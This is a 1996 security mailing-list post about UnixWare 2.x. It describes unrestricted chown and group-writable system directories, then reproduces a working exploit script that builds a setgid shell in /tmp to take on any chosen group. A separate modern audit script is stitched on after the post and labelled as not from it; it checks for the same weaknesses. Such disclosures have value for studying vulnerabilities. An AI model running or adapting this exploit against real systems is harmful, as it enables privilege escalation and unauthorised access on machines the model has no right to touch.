List: best-of-security
Subject: BoS: More on UnixWare 2.x vulnerability
From: Julian Assange <proff () suburbia ! net>
Date: 1996-09-01 14:23:58
I've found out more about UnixWare 2. It seems the system (and I don't
know if SCO's own native OSs do this, SCO UNIX/SCO XENIX/SCO OpenServer)
allows chown'ing a file *to* any arbitrary user and group. Hm, lessee.
Create a file that uses up all the available space in /tmp, then chown it
root:bin. Okay, now someone else tell me who created that file.
Anyway, back to the setgid problem. I've found an exploit script (it's not
all that difficult to do by hand, anyway...) on an FTP site pointed to by
the floating post about this bug. It follows. While browsing the default
installation of UnixWare, it seems a couple *hundred* directories, including
particularly /usr/bin, /sbin, and /usr/sbin, are writable by group. This is
bad, very bad.
=====
#!/bin/sh
# cgroup - pick a group id for unixware (run as cgroup <groupid>)
cat >/tmp/.$$.c <<_end_
#include <unistd.h>
int main(void) { setgid(getegid()); execl("/bin/sh", "-", (char *)0); }
_end_
cc -o /tmp/.$$ /tmp/.$$.c
rm -f /tmp/.$$.c
chgrp $1 /tmp/.$$
chmod 6100 /tmp/.$$
/tmp/.$$
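As an added defensive check (not from the post, and not UnixWare's own tooling), a POSIX sh audit that lists group-writable directories under the system paths the post singles out and probes whether the filesystem restricts chown to root; the function names `audit_groupwrite` and `chown_restricted` are assumed here.

```sh
#!/bin/sh
# Added example: audit the two conditions the post describes.

# Print every group-writable directory under the given roots.
# Returns 1 if any were found (so it can gate an alert), 0 otherwise.
audit_groupwrite() {
    hits=""
    for root in "$@"; do
        if [ -d "$root" ]; then
            # -perm -020: group-write bit set (octal form for portability)
            found=$(find "$root" -type d -perm -020 2>/dev/null)
            if [ -n "$found" ]; then
                hits="$hits$found
"
            fi
        fi
    done
    [ -n "$hits" ] || return 0
    printf '%s' "$hits"
    return 1
}

# Return 0 if only root may give a file away on the filesystem holding $1
# (the property the post says UnixWare 2 lacks). getconf reports
# _POSIX_CHOWN_RESTRICTED per path; "undefined", -1 or 0 mean unrestricted.
chown_restricted() {
    v=$(getconf _POSIX_CHOWN_RESTRICTED "${1:-/tmp}" 2>/dev/null) || return 1
    case "$v" in
        ''|undefined|-1|0) return 1 ;;
        *) return 0 ;;
    esac
}

# Usage against the directories the post names:
#   audit_groupwrite /usr/bin /sbin /usr/sbin || echo "group-writable system dirs"
#   chown_restricted /tmp || echo "unprivileged users can chown files away"
```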